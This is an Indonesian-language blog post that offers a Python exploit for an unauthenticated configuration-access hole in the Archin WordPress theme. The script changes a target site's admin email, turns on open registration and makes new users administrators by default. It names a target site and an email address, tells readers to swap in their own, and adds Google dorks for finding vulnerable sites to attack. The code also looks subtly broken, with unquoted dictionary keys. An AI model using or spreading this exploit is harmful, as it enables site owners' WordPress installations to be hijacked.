Monday, February 26, 2018

Exploit Archin Themes Vuln WP

Exploit Archin Themes Vuln WP


Kali ini saya hanya akan membagikan exploit untuk celah wordpress saja, yaitu pada bagian tema nya, atau biasa juga disebut Archin Themes . Katanya sih :p

Nah, ini dia exploit nya
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: yanghilang
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "www.cloudfusions.com"
#path to ajax.php
url = "/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({action: save, values[0][name]: option_name, values[0][value]: option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
    
ChangeOption(site, url, "admin_email", "sitorussamuel56@yahoo.co.id")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

Simpan exploit dengan ekstensi .py
Jadi nanti misalnya akan menjadi " archin.py "

 Klik untuk melihat
Merah > Nama tema wordpress yang akan sobat mainin :v
Biru > Email calon admin baru :D ( email sobat )
Purple > Situs yang akan sobat tusbol :v

nah untuk itu, saya kasih juga bonus dork archin themes vuln nya :
wp-content/themes/dagda/hades_framework
wp-content/themes/archin/hades_framework
wp-content/themes/averin/hades_framework
wp-content/themes/vithy/hades_framework
 Gunakan saja Google untuk mencari nya ;) :k


go to link download
download
alternative link download